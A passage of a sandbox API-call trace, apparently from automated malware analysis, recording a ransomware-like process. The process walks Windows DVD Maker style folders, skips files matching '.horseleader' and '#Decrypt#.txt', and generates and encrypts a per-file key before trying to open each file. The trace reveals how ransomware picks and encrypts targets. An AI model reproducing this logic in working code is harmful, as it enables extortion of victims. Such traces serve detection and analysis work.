(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.543] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eeebddb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eeebddb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x166e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Heart_VideoInset.png", cAlternateFileName="")) returned 1 [0251.544] lstrcmpiW (lpString1="Heart_VideoInset.png", lpString2="Windows") returned -1 [0251.544] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png") returned 68 [0251.544] StrStrIW (lpFirst="Heart_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.544] lstrcmpW (lpString1="Heart_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.544] lstrcmpW (lpString1="Heart_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.544] lstrlenW (lpString=".testttjffg") returned 11 [0251.544] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.544] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.544] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.544] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.544] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="HueCycle", cAlternateFileName="")) returned 1 [0251.544] lstrcmpiW (lpString1="HueCycle", lpString2="Windows") returned -1 [0251.545] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 56 [0251.545] lstrcmpW (lpString1="HueCycle", lpString2=".") returned 1 [0251.545] lstrcmpW (lpString1="HueCycle", lpString2="..") returned 1 [0251.545] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.545] GetProcessHeap () returned 0x780000 [0251.545] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.545] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*") returned 58 [0251.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.548] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\.") returned 58 [0251.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.548] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.548] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\..") returned 59 [0251.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.548] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6faf8c48, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6faf8c48, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.548] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 74 [0251.548] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.549] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.549] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.549] lstrlenW (lpString=".testttjffg") returned 11 [0251.549] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.549] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.549] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.549] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb1eda5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb1eda5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.549] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.549] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 69 [0251.549] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.549] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.549] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.550] lstrlenW (lpString=".testttjffg") returned 11 [0251.550] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.550] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.550] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.550] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.551] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fad2aeb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fad2aeb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x43e2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="colorcycle.png", cAlternateFileName="")) returned 1 [0251.551] lstrcmpiW (lpString1="colorcycle.png", lpString2="Windows") returned -1 [0251.551] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 71 [0251.551] StrStrIW (lpFirst="colorcycle.png", lpSrch=".horseleader") returned 0x0 [0251.551] lstrcmpW (lpString1="colorcycle.png", lpString2="#Decrypt#.txt") returned 1 [0251.551] lstrcmpW (lpString1="colorcycle.png", lpString2="_uninstalling_.png") returned 1 [0251.551] lstrlenW (lpString=".testttjffg") returned 11 [0251.551] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png", lpSrch=".testttjffg") returned 0x0 [0251.551] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.551] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.552] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.552] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb44f02, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb44f02, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="huemainsubpicture2.png", cAlternateFileName="")) returned 1 [0251.552] lstrcmpiW (lpString1="huemainsubpicture2.png", lpString2="Windows") returned -1 [0251.552] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 79 [0251.552] StrStrIW (lpFirst="huemainsubpicture2.png", lpSrch=".horseleader") returned 0x0 [0251.552] lstrcmpW (lpString1="huemainsubpicture2.png", lpString2="#Decrypt#.txt") returned 1 [0251.552] lstrcmpW (lpString1="huemainsubpicture2.png", lpString2="_uninstalling_.png") returned 1 [0251.552] lstrlenW (lpString=".testttjffg") returned 11 [0251.552] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png", lpSrch=".testttjffg") returned 0x0 [0251.553] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.553] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.553] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc29730, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc29730, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.553] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.553] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.553] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.553] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.554] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.554] lstrlenW (lpString=".testttjffg") returned 11 [0251.554] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.554] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.554] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.554] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbdd476, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbdd476, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.554] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.554] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.554] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.555] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.555] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.555] lstrlenW (lpString=".testttjffg") returned 11 [0251.555] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.555] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.555] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.555] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbdd476, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbdd476, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.555] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.556] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png") returned 90 [0251.556] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.556] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.556] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.556] lstrlenW (lpString=".testttjffg") returned 11 [0251.556] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.557] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb911bc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb911bc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.557] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.557] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.557] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.557] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.557] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.557] lstrlenW (lpString=".testttjffg") returned 11 [0251.557] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.557] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.557] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.558] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.558] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb911bc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb911bc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.558] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.558] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png") returned 87 [0251.558] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.558] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.558] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.558] lstrlenW (lpString=".testttjffg") returned 11 [0251.558] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.559] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.559] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.559] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbb7319, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbb7319, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.559] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.559] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.559] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.559] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 